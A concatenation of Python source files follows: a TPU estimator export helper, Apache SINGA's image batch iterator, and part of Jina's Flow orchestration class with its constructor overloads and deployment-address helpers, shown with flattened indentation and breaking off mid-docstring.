'{} The transfer size is larger than the protobuf limit. Please '
'consider to use Tensors with smaller shapes or reduce batch '
'size. Given:\n'
'{}'.format(
message, '\n'.join([
' -- Key: {}, Shape: {}'.format(k, v)
for k, v in tensor_structure.items()
])))
def _add_item_to_params(params, key, value):
"""Adds a new item into `params`."""
if isinstance(params, hparam.HParams):
# For HParams, we need to use special API.
if key in params:
params.set_hparam(key, value)
else:
params.add_hparam(key, value)
else:
# Now params is Python dict.
params[key] = value
def export_estimator_savedmodel(estimator,
export_dir_base,
serving_input_receiver_fn,
assets_extra=None,
as_text=False,
checkpoint_path=None,
strip_default_attrs=False):
"""Export `Estimator` trained model for TPU inference.
Args:
estimator: `Estimator` with which model has been trained.
export_dir_base: A string containing a directory in which to create
timestamped subdirectories containing exported SavedModels.
serving_input_receiver_fn: A function that takes no argument and returns a
`ServingInputReceiver` or `TensorServingInputReceiver`.
assets_extra: A dict specifying how to populate the assets.extra directory
within the exported SavedModel, or `None` if no extra assets are needed.
as_text: whether to write the SavedModel proto in text format.
checkpoint_path: The checkpoint path to export. If `None` (the default),
the most recent checkpoint found within the model directory is chosen.
strip_default_attrs: Boolean. If `True`, default-valued attributes will be
removed from the NodeDefs.
Returns:
The string path to the exported directory.
"""
# `TPUEstimator` requires `tpu_config.RunConfig`, so we cannot use
# `estimator.config`.
config = tpu_config.RunConfig(model_dir=estimator.model_dir)
est = TPUEstimator(
estimator._model_fn, # pylint: disable=protected-access
config=config,
params=estimator.params,
use_tpu=True,
train_batch_size=2048, # Does not matter.
eval_batch_size=2048, # Does not matter.
)
return est.export_savedmodel(export_dir_base, serving_input_receiver_fn,
assets_extra, as_text, checkpoint_path,
strip_default_attrs)
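# Usage sketch for the export helper above. `trained_estimator` and
# `my_serving_input_receiver_fn` are hypothetical placeholders, not names from
# the original code.
def _example_export_for_tpu_inference(trained_estimator,
                                      my_serving_input_receiver_fn):
  return export_estimator_savedmodel(
      estimator=trained_estimator,
      export_dir_base='/tmp/tpu_export',
      serving_input_receiver_fn=my_serving_input_receiver_fn)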
|
data.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
'''
This module includes classes for loading and prefetching data batches.
Example usage::
import image_tool
from PIL import Image
from singa.data import ImageBatchIter
tool = image_tool.ImageTool()
def image_transform(img_path):
global tool
return tool.load(img_path).resize_by_range(
(112, 128)).random_crop(
(96, 96)).flip().get()
data = ImageBatchIter('train.txt', 3,
image_transform, shuffle=True, delimiter=',',
image_folder='images/',
capacity=10)
data.start()
# imgs is a numpy array for a batch of images,
# shape: batch_size, 3 (RGB), height, width
imgs, labels = data.next()
# convert numpy array back into images
for idx in range(imgs.shape[0]):
img = Image.fromarray(imgs[idx].astype(np.uint8).transpose(1, 2, 0),
'RGB')
img.save('img%d.png' % idx)
data.end()
'''
from __future__ import print_function
from __future__ import absolute_import
from builtins import range
from builtins import object
import os
import random
import time
from multiprocessing import Process, Queue
import numpy as np
class ImageBatchIter(object):
'''Utility for iterating over an image dataset to get mini-batches.
Args:
img_list_file(str): name of the file containing image meta data; each
line consists of image_path_suffix delimiter meta_info,
where meta info could be label index or label strings, etc.
meta_info should not contain the delimiter. If the meta_info
of each image is just the label index, then we will parse the
label index into a numpy array with length=batchsize
(for compatibility); otherwise, we return a list of meta_info;
if meta info is not available, we return a list of None.
batch_size(int): num of samples in one mini-batch
image_transform: a function for image augmentation; it accepts the full
image path and outputs a list of augmented images.
shuffle(boolean): True for shuffling images in the list
delimiter(char): delimiter between image_path_suffix and label, e.g.,
space or comma
image_folder(str): prefix of the image path
capacity(int): the max num of mini-batches in the internal queue.
'''
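# Illustrative img_list_file contents (hypothetical paths, comma delimiter):
# each line is image_path_suffix followed by the label index, e.g.
#   cat/001.jpg,0
#   dog/002.jpg,1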
def __init__(self,
img_list_file,
batch_size,
image_transform,
shuffle=True,
delimiter=' ',
image_folder=None,
capacity=10):
self.img_list_file = img_list_file
self.queue = Queue(capacity)
self.batch_size = batch_size
self.image_transform = image_transform
self.shuffle = shuffle
self.delimiter = delimiter
self.image_folder = image_folder
self.stop = False
self.p = None
with open(img_list_file, 'r') as fd:
self.num_samples = len(fd.readlines())
def start(self):
self.p = Process(target=self.run)
self.p.start()
return
def __next__(self):
assert self.p is not None, 'call start before next'
while self.queue.empty():
time.sleep(0.1)
x, y = self.queue.get() # dequeue one mini-batch
return x, y
def end(self):
if self.p is not None:
self.stop = True
time.sleep(0.1)
self.p.terminate()
def run(self):
img_list = []
is_label_index = True
for line in open(self.img_list_file, 'r'):
item = line.strip('\n').split(self.delimiter)
if len(item) < 2:
is_label_index = False
img_list.append((item[0].strip(), None))
else:
if not item[1].strip().isdigit():
# the meta info is not label index
is_label_index = False
img_list.append((item[0].strip(), item[1].strip()))
index = 0 # index for the image
if self.shuffle:
random.shuffle(img_list)
while not self.stop:
if not self.queue.full():
x, y = [], []
i = 0
while i < self.batch_size:
img_path, img_meta = img_list[index]
aug_images = self.image_transform(
os.path.join(self.image_folder, img_path))
assert i + len(aug_images) <= self.batch_size, \
'too many images (%d) in a batch (%d)' % \
(i + len(aug_images), self.batch_size)
for img in aug_images:
ary = np.asarray(img.convert('RGB'), dtype=np.float32)
x.append(ary.transpose(2, 0, 1))
if is_label_index:
y.append(int(img_meta))
else:
y.append(img_meta)
i += 1
index += 1
if index == self.num_samples:
index = 0 # reset to the first image
if self.shuffle:
random.shuffle(img_list)
# enqueue one mini-batch
if is_label_index:
self.queue.put((np.asarray(x), np.asarray(y,
dtype=np.int32)))
else:
self.queue.put((np.asarray(x), y))
else:
time.sleep(0.1)
return
if __name__ == '__main__':
from . import image_tool
from PIL import Image
tool = image_tool.ImageTool()
def image_transform(img_path):
global tool
return tool.load(img_path).resize_by_range((112, 128)).random_crop(
(96, 96)).flip().get()
data = ImageBatchIter('train.txt',
3,
image_transform,
shuffle=False,
delimiter=',',
image_folder='images/',
capacity=10)
data.start()
imgs, labels = next(data)
print(labels)
for idx in range(imgs.shape[0]):
img = Image.fromarray(imgs[idx].astype(np.uint8).transpose(1, 2, 0),
'RGB')
img.save('img%d.png' % idx)
data.end()
|
base.py
|
import argparse
import base64
import copy
import json
import multiprocessing
import os
import sys
import threading
import time
import uuid
from collections import OrderedDict
from contextlib import ExitStack
from typing import (
TYPE_CHECKING,
Dict,
List,
Optional,
Set,
Tuple,
Type,
Union,
overload,
)
from rich import print
from rich.panel import Panel
from rich.table import Table
from jina import __default_host__, __default_port_monitoring__, __docker_host__, helper
from jina.clients import Client
from jina.clients.mixin import AsyncPostMixin, PostMixin
from jina.enums import (
DeploymentRoleType,
FlowBuildLevel,
FlowInspectType,
GatewayProtocolType,
)
from jina.excepts import (
FlowMissingDeploymentError,
FlowTopologyError,
PortAlreadyUsed,
RuntimeFailToStart,
)
from jina.helper import (
ArgNamespace,
CatchAllCleanupContextManager,
colored_rich,
download_mermaid_url,
get_internal_ip,
get_public_ip,
get_rich_console,
is_port_free,
typename,
)
from jina.jaml import JAMLCompatible
from jina.logging.logger import JinaLogger
from jina.orchestrate.deployments import Deployment
from jina.orchestrate.flow.builder import _hanging_deployments, allowed_levels
from jina.parsers import (
set_client_cli_parser,
set_deployment_parser,
set_gateway_parser,
)
from jina.parsers.flow import set_flow_parser
__all__ = ['Flow']
from jina.serve.networking import host_is_local, in_docker
class FlowType(type(ExitStack), type(JAMLCompatible)):
"""Type of Flow, metaclass of :class:`BaseFlow`"""
pass
_regex_port = r'(.*?):([0-9]{1,4}|[1-5][0-9]{4}|6[0-4][0-9]{3}|65[0-4][0-9]{2}|655[0-2][0-9]|6553[0-5])$'
if TYPE_CHECKING:
from jina.clients.base import BaseClient
from jina.orchestrate.flow.asyncio import AsyncFlow
from jina.serve.executors import BaseExecutor
GATEWAY_NAME = 'gateway'
FALLBACK_PARSERS = [
set_gateway_parser(),
set_deployment_parser(),
set_client_cli_parser(),
set_flow_parser(),
]
class Flow(PostMixin, JAMLCompatible, ExitStack, metaclass=FlowType):
"""Flow is how Jina streamlines and distributes Executors."""
# overload_inject_start_client_flow
@overload
def __init__(
self,
*,
asyncio: Optional[bool] = False,
host: Optional[str] = '0.0.0.0',
port: Optional[int] = None,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
return_responses: Optional[bool] = False,
tls: Optional[bool] = False,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina client` CLI.
:param asyncio: If set, then the input and output of this Client work in an asynchronous manner.
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param port: The port of the Gateway, which the client should connect to.
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
:param return_responses: If set, return results as List of Requests instead of a reduced DocArray.
:param tls: If set, connect to gateway using tls encryption
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_client_flow
# overload_inject_start_gateway_flow
@overload
def __init__(
self,
*,
compression: Optional[str] = 'NoCompression',
cors: Optional[bool] = False,
default_swagger_ui: Optional[bool] = False,
deployments_addresses: Optional[str] = '{}',
deployments_disable_reduce: Optional[str] = '[]',
description: Optional[str] = None,
env: Optional[dict] = None,
expose_endpoints: Optional[str] = None,
expose_graphql_endpoint: Optional[bool] = False,
graph_conditions: Optional[str] = '{}',
graph_description: Optional[str] = '{}',
grpc_server_kwargs: Optional[dict] = None,
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
log_config: Optional[str] = None,
monitoring: Optional[bool] = False,
name: Optional[str] = 'gateway',
native: Optional[bool] = False,
no_crud_endpoints: Optional[bool] = False,
no_debug_endpoints: Optional[bool] = False,
output_array_type: Optional[str] = None,
polling: Optional[str] = 'ANY',
port: Optional[int] = None,
port_monitoring: Optional[int] = 9090,
prefetch: Optional[int] = 0,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
replicas: Optional[int] = 1,
runtime_cls: Optional[str] = 'GRPCGatewayRuntime',
shards: Optional[int] = 1,
ssl_certfile: Optional[str] = None,
ssl_keyfile: Optional[str] = None,
timeout_ctrl: Optional[int] = 60,
timeout_ready: Optional[int] = 600000,
timeout_send: Optional[int] = None,
title: Optional[str] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
uvicorn_kwargs: Optional[dict] = None,
workspace: Optional[str] = None,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina gateway` CLI.
:param compression: The compression mechanism used when sending requests to Executors. Possibilities are: `NoCompression, Gzip, Deflate`. For more details, check https://grpc.github.io/grpc/python/grpc.html#compression.
:param cors: If set, a CORS middleware is added to FastAPI frontend to allow cross-origin access.
:param default_swagger_ui: If set, the default swagger ui is used for `/docs` endpoint.
:param deployments_addresses: dictionary JSON with the input addresses of each Deployment
:param deployments_disable_reduce: list JSON disabling the built-in merging mechanism for each Deployment listed
:param description: The description of this HTTP server. It will be used in automatic docs such as Swagger UI.
:param env: The map of environment variables that are available inside runtime
:param expose_endpoints: A JSON string that represents a map from executor endpoints (`@requests(on=...)`) to HTTP endpoints.
:param expose_graphql_endpoint: If set, /graphql endpoint is added to HTTP interface.
:param graph_conditions: Dictionary stating which filtering conditions each Executor in the graph requires to receive Documents.
:param graph_description: Routing graph for the gateway
:param grpc_server_kwargs: Dictionary of kwargs arguments that will be passed to the grpc server when starting the server # todo update
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for binding to, by default it is 0.0.0.0
:param log_config: The YAML config of the logger used in this object.
:param monitoring: If set, spawn an http server with a prometheus endpoint to expose metrics
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors are allowed, and the Executor is always run inside WorkerRuntime.
:param no_crud_endpoints: If set, /index, /search, /update, /delete endpoints are removed from HTTP interface.
Any executor that has `@requests(on=...)` bind with those values will receive data requests.
:param no_debug_endpoints: If set, /status /post endpoints are removed from HTTP interface.
:param output_array_type: The type of array `tensor` and `embedding` will be serialized to.
Supports the same types as `docarray.to_protobuf(.., ndarray_type=...)`, which can be found
`here <https://docarray.jina.ai/fundamentals/document/serialization/#from-to-protobuf>`.
Defaults to retaining whatever type is returned by the Executor.
:param polling: The polling strategy of the Deployment and its endpoints (when `shards>1`).
Can be defined for all endpoints of a Deployment or by endpoint.
Define per Deployment:
- ANY: only one (whoever is idle) Pod polls the message
- ALL: all Pods poll the message (like a broadcast)
Define per Endpoint:
JSON dict, {endpoint: PollingType}
{'/custom': 'ALL', '/search': 'ANY', '*': 'ANY'}
:param port: The port for input data to bind to, default is a random port between [49152, 65535]
:param port_monitoring: The port on which the prometheus server is exposed, default port is 9090
:param prefetch: Number of requests fetched from the client before feeding into the first Executor.
Used to control the speed of data input into a Flow. 0 disables prefetch (disabled by default)
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
:param py_modules: The customized Python modules that need to be imported before loading the Executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param replicas: The number of replicas in the deployment
:param runtime_cls: The runtime class to run inside the Pod
:param shards: The number of shards in the deployment running at the same time. For more details check https://docs.jina.ai/fundamentals/flow/create-flow/#complex-flow-topologies
:param ssl_certfile: the path to the certificate file
:param ssl_keyfile: the path to the key file
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pod waits for the runtime to be ready, -1 for waiting forever
:param timeout_send: The timeout in milliseconds used when sending data requests to Executors, -1 means no timeout, disabled by default
:param title: The title of this HTTP server. It will be used in automatic docs such as Swagger UI.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When using it under Python, one can additionally use the following values:
- a Python dict that represents the config
- a text file stream that has a `.read()` interface
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param uvicorn_kwargs: Dictionary of kwargs arguments that will be passed to Uvicorn server when starting the server
More details can be found in Uvicorn docs: https://www.uvicorn.org/settings/
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_gateway_flow
# overload_inject_start_flow
@overload
def __init__(
self,
*,
env: Optional[dict] = None,
inspect: Optional[str] = 'COLLECT',
log_config: Optional[str] = None,
name: Optional[str] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
uses: Optional[str] = None,
workspace: Optional[str] = None,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina flow` CLI.
:param env: The map of environment variables that are available inside runtime
:param inspect: The strategy for the inspect deployments in the flow.
If `REMOVE` is given then all inspect deployments are removed when building the flow.
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param uses: The YAML file represents a flow
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_flow
def __init__(
self,
args: Optional['argparse.Namespace'] = None,
**kwargs,
):
super().__init__()
self._version = '1' #: YAML version number, this will be later overridden if YAML config says the other way
self._deployment_nodes = OrderedDict() # type: Dict[str, Deployment]
self._inspect_deployments = {} # type: Dict[str, str]
self._endpoints_mapping = {} # type: Dict[str, Dict]
self._build_level = FlowBuildLevel.EMPTY
self._last_changed_deployment = [
GATEWAY_NAME
] #: default first deployment is gateway, will add when build()
self._update_args(args, **kwargs)
if isinstance(self.args, argparse.Namespace):
self.logger = JinaLogger(
self.__class__.__name__, **vars(self.args), **self._common_kwargs
)
else:
self.logger = JinaLogger(self.__class__.__name__, **self._common_kwargs)
def _update_args(self, args, **kwargs):
from jina.helper import ArgNamespace
from jina.parsers.flow import set_flow_parser
_flow_parser = set_flow_parser()
if args is None:
args = ArgNamespace.kwargs2namespace(
kwargs, _flow_parser, True, fallback_parsers=FALLBACK_PARSERS
)
self.args = args
# common args should be the ones that can not be parsed by _flow_parser
known_keys = vars(args)
self._common_kwargs = {k: v for k, v in kwargs.items() if k not in known_keys}
self._kwargs = ArgNamespace.get_non_defaults_args(
args, _flow_parser
) #: for yaml dump
if self._common_kwargs.get('asyncio', False) and not isinstance(
self, AsyncPostMixin
):
from jina.orchestrate.flow.asyncio import AsyncFlow
self.__class__ = AsyncFlow
@staticmethod
def _parse_endpoints(
op_flow, deployment_name, endpoint, connect_to_last_deployment=False
) -> Set:
# parsing needs
if isinstance(endpoint, str):
endpoint = [endpoint]
elif not endpoint:
if op_flow._last_changed_deployment and connect_to_last_deployment:
endpoint = [op_flow.last_deployment]
else:
endpoint = []
if isinstance(endpoint, (list, tuple)):
for idx, s in enumerate(endpoint):
if s == deployment_name:
raise FlowTopologyError(
'the input/output of a deployment cannot be itself'
)
else:
raise ValueError(f'endpoint={endpoint} is not parsable')
# if an endpoint is being inspected, then replace it with inspected Deployment
endpoint = set(op_flow._inspect_deployments.get(ep, ep) for ep in endpoint)
return endpoint
@property
def last_deployment(self):
"""Last deployment
.. # noqa: DAR401
.. # noqa: DAR201
"""
return self._last_changed_deployment[-1]
@last_deployment.setter
def last_deployment(self, name: str):
"""
Set a Deployment as the last Deployment in the Flow, useful when modifying the Flow.
.. # noqa: DAR401
:param name: the name of the existing Deployment
"""
if name not in self._deployment_nodes:
raise FlowMissingDeploymentError(f'{name} can not be found in this Flow')
if self._last_changed_deployment and name == self.last_deployment:
pass
else:
self._last_changed_deployment.append(name)
# graph is now changed so we need to
# reset the build level to the lowest
self._build_level = FlowBuildLevel.EMPTY
@allowed_levels([FlowBuildLevel.EMPTY])
def _add_gateway(
self,
needs: str,
graph_description: Dict[str, List[str]],
deployments_addresses: Dict[str, List[str]],
graph_conditions: Dict[str, Dict],
deployments_disabled_reduce: List[str],
**kwargs,
):
kwargs.update(
dict(
name=GATEWAY_NAME,
ctrl_with_ipc=True, # otherwise ctrl port would be conflicted
host=self.host,
protocol=self.protocol,
port=self.port,
deployment_role=DeploymentRoleType.GATEWAY,
expose_endpoints=json.dumps(self._endpoints_mapping),
env=self.env,
)
)
kwargs.update(self._common_kwargs)
args = ArgNamespace.kwargs2namespace(kwargs, set_gateway_parser())
# We need to check later if the port was manually set or randomly
args.default_port = (
kwargs.get('port', None) is None and kwargs.get('port_expose', None) is None
)
args.noblock_on_start = True
args.graph_description = json.dumps(graph_description)
args.graph_conditions = json.dumps(graph_conditions)
args.deployments_addresses = json.dumps(deployments_addresses)
args.deployments_disable_reduce = json.dumps(deployments_disabled_reduce)
self._deployment_nodes[GATEWAY_NAME] = Deployment(args, needs)
def _get_deployments_addresses(self) -> Dict[str, List[str]]:
graph_dict = {}
for node, v in self._deployment_nodes.items():
if node == 'gateway':
continue
if v.head_args:
# add head information
graph_dict[node] = [f'{v.protocol}://{v.host}:{v.head_port}']
else:
# there is no head, add the worker connection information instead
host = v.host
if host_is_local(host) and in_docker() and v.dockerized_uses:
host = __docker_host__
graph_dict[node] = [f'{v.protocol}://{host}:{port}' for port in v.ports]
return graph_dict
def _get_k8s_deployments_addresses(
self, k8s_namespace: str
) -> Dict[str, List[str]]:
graph_dict = {}
from jina.orchestrate.deployments.config.helper import to_compatible_name
from jina.serve.networking import GrpcConnectionPool
for node, v in self._deployment_nodes.items():
if node == 'gateway':
continue
if v.external:
deployment_k8s_address = f'{v.host}'
elif v.head_args:
deployment_k8s_address = (
f'{to_compatible_name(v.head_args.name)}.{k8s_namespace}.svc'
)
else:
deployment_k8s_address = (
f'{to_compatible_name(v.name)}.{k8s_namespace}.svc'
)
external_port = v.head_port if v.head_port else v.port
graph_dict[node] = [
f'{v.protocol}://{deployment_k8s_address}:{external_port if v.external else GrpcConnectionPool.K8S_PORT}'
]
return graph_dict if graph_dict else None
def _get_docker_compose_deployments_addresses(self) -> Dict[str, List[str]]:
graph_dict = {}
from jina.orchestrate.deployments.config.docker_compose import port
from jina.orchestrate.deployments.config.helper import to_compatible_name
for node, v in self._deployment_nodes.items():
if node == 'gateway':
continue
if v.external:
deployment_docker_compose_address = [
f'{v.protocol}://{v.host}:{v.port}'
]
elif v.head_args:
deployment_docker_compose_address = [
f'{to_compatible_name(v.head_args.name)}:{port}'
]
else:
if v.args.replicas == 1:
deployment_docker_compose_address = [
f'{to_compatible_name(v.name)}:{port}'
]
else:
deployment_docker_compose_address = []
for rep_id in range(v.args.replicas):
node_name = f'{v.name}/rep-{rep_id}'
deployment_docker_compose_address.append(
f'{to_compatible_name(node_name)}:{port}'
)
graph_dict[node] = deployment_docker_compose_address
return graph_dict
def _get_graph_conditions(self) -> Dict[str, Dict]:
graph_condition = {}
for node, v in self._deployment_nodes.items():
if v.args.when is not None: # condition on input docs
graph_condition[node] = v.args.when
return graph_condition
def _get_disabled_reduce_deployments(self) -> List[str]:
disabled_deployments = []
for node, v in self._deployment_nodes.items():
if v.args.disable_reduce:
disabled_deployments.append(node)
return disabled_deployments
def _get_graph_representation(self) -> Dict[str, List[str]]:
def _add_node(graph, n):
# in the graph we need to distinguish between start and end gateway, although they are the same deployment
if n == 'gateway':
n = 'start-gateway'
if n not in graph:
graph[n] = []
return n
graph_dict = {}
for node, v in self._deployment_nodes.items():
node = _add_node(graph_dict, node)
if node == 'start-gateway':
continue
for need in sorted(v.needs):
need = _add_node(graph_dict, need)
graph_dict[need].append(node)
# find all non hanging leafs
last_deployment = self.last_deployment
if last_deployment != 'gateway':
graph_dict[last_deployment].append('end-gateway')
return graph_dict
@allowed_levels([FlowBuildLevel.EMPTY])
def needs(
self, needs: Union[Tuple[str], List[str]], name: str = 'joiner', *args, **kwargs
) -> 'Flow':
"""
Add a blocker to the Flow; wait until all Pods defined in **needs** have completed.
.. # noqa: DAR401
:param needs: list of service names to wait
:param name: the name of this joiner, by default is ``joiner``
:param args: additional positional arguments forwarded to the add function
:param kwargs: additional key value arguments forwarded to the add function
:return: the modified Flow
"""
if len(needs) <= 1:
raise FlowTopologyError(
'no need to wait for a single service, need len(needs) > 1'
)
return self.add(
name=name,
needs=needs,
deployment_role=DeploymentRoleType.JOIN,
*args,
**kwargs,
)
def needs_all(self, name: str = 'joiner', *args, **kwargs) -> 'Flow':
"""
Collect all hanging Deployments so far and add a blocker to the Flow; wait until all hanging Pods have completed.
:param name: the name of this joiner (default is ``joiner``)
:param args: additional positional arguments which are forwarded to the add and needs function
:param kwargs: additional key value arguments which are forwarded to the add and needs function
:return: the modified Flow
"""
needs = _hanging_deployments(self)
if len(needs) == 1:
return self.add(name=name, needs=needs, *args, **kwargs)
return self.needs(name=name, needs=needs, *args, **kwargs)
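# Usage sketch (hypothetical executor names, for illustration only): build a
# two-branch topology and join both branches before the gateway.
#
#     f = (Flow()
#          .add(name='embed_a')
#          .add(name='embed_b', needs='gateway')
#          .needs(['embed_a', 'embed_b'], name='merge'))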
# overload_inject_start_deployment
@overload
def add(
self,
*,
compression: Optional[str] = 'NoCompression',
connection_list: Optional[str] = None,
disable_auto_volume: Optional[bool] = False,
disable_reduce: Optional[bool] = False,
docker_kwargs: Optional[dict] = None,
entrypoint: Optional[str] = None,
env: Optional[dict] = None,
external: Optional[bool] = False,
force_update: Optional[bool] = False,
gpus: Optional[str] = None,
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
install_requirements: Optional[bool] = False,
log_config: Optional[str] = None,
monitoring: Optional[bool] = False,
name: Optional[str] = None,
native: Optional[bool] = False,
output_array_type: Optional[str] = None,
polling: Optional[str] = 'ANY',
port: Optional[int] = None,
port_monitoring: Optional[int] = 9090,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
quiet_remote_logs: Optional[bool] = False,
replicas: Optional[int] = 1,
runtime_cls: Optional[str] = 'WorkerRuntime',
shards: Optional[int] = 1,
timeout_ctrl: Optional[int] = 60,
timeout_ready: Optional[int] = 600000,
timeout_send: Optional[int] = None,
upload_files: Optional[List[str]] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_after: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_after_address: Optional[str] = None,
uses_before: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_before_address: Optional[str] = None,
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
volumes: Optional[List[str]] = None,
when: Optional[dict] = None,
workspace: Optional[str] = None,
**kwargs,
) -> Union['Flow', 'AsyncFlow']:
"""Add an Executor to the current Flow object.
:param compression: The compression mechanism used when sending requests from the Head to the WorkerRuntimes. Possibilities are `NoCompression, Gzip, Deflate`. For more details, check https://grpc.github.io/grpc/python/grpc.html#compression.
:param connection_list: dictionary JSON with a list of connections to configure
:param disable_auto_volume: Do not automatically mount a volume for dockerized Executors.
:param disable_reduce: Disable the built-in reduce mechanism, set this if the reduction is to be handled by the Executor connected to this Head
:param docker_kwargs: Dictionary of kwargs arguments that will be passed to the Docker SDK when starting the docker
container.
More details can be found in the Docker SDK docs: https://docker-py.readthedocs.io/en/stable/
:param entrypoint: The entrypoint command overrides the ENTRYPOINT in the Docker image; when not set, the Docker image's ENTRYPOINT takes effect.
:param env: The map of environment variables that are available inside runtime
:param external: The Deployment will be considered an external Deployment that has been started independently from the Flow. This Deployment will not be context-managed by the Flow.
:param force_update: If set, always pull the latest Hub Executor bundle even if it exists locally
:param gpus: This argument allows a dockerized Jina Executor to discover local GPU devices.
Note,
- To access all gpus, use `--gpus all`.
- To access multiple gpus, e.g. make use of 2 gpus, use `--gpus 2`.
- To access specified gpus based on device id, use `--gpus device=[YOUR-GPU-DEVICE-ID]`
- To access specified gpus based on multiple device id, use `--gpus device=[YOUR-GPU-DEVICE-ID1],device=[YOUR-GPU-DEVICE-ID2]`
- To specify more parameters, use `--gpus device=[YOUR-GPU-DEVICE-ID],runtime=nvidia,capabilities=display`
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for binding to, by default it is 0.0.0.0
:param install_requirements: If set, install `requirements.txt` in the Hub Executor bundle to local
:param log_config: The YAML config of the logger used in this object.
:param monitoring: If set, spawn an http server with a prometheus endpoint to expose metrics
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors are allowed, and the Executor is always run inside WorkerRuntime.
:param output_array_type: The type of array `tensor` and `embedding` will be serialized to.
Supports the same types as `docarray.to_protobuf(.., ndarray_type=...)`, which can be found
`here <https://docarray.jina.ai/fundamentals/document/serialization/#from-to-protobuf>`.
Defaults to retaining whatever type is returned by the Executor.
:param polling: The polling strategy of the Deployment and its endpoints (when `shards>1`).
Can be defined for all endpoints of a Deployment or by endpoint.
Define per Deployment:
- ANY: only one (whoever is idle) Pod polls the message
- ALL: all Pods poll the message (like a broadcast)
Define per Endpoint:
JSON dict, {endpoint: PollingType}
{'/custom': 'ALL', '/search': 'ANY', '*': 'ANY'}
:param port: The port for input data to bind to, default is a random port between [49152, 65535]
:param port_monitoring: The port on which the prometheus server is exposed, default port is 9090
:param py_modules: The customized Python modules that need to be imported before loading the Executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param quiet_remote_logs: Do not display the streaming of remote logs on local console
:param replicas: The number of replicas in the deployment
:param runtime_cls: The runtime class to run inside the Pod
:param shards: The number of shards in the deployment running at the same time. For more details check https://docs.jina.ai/fundamentals/flow/create-flow/#complex-flow-topologies
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pod waits for the runtime to be ready, -1 for waiting forever
:param timeout_send: The timeout in milliseconds used when sending data requests to Executors, -1 means no timeout, disabled by default
:param upload_files: The files on the host to be uploaded to the remote
workspace. This can be useful when your Deployment has more
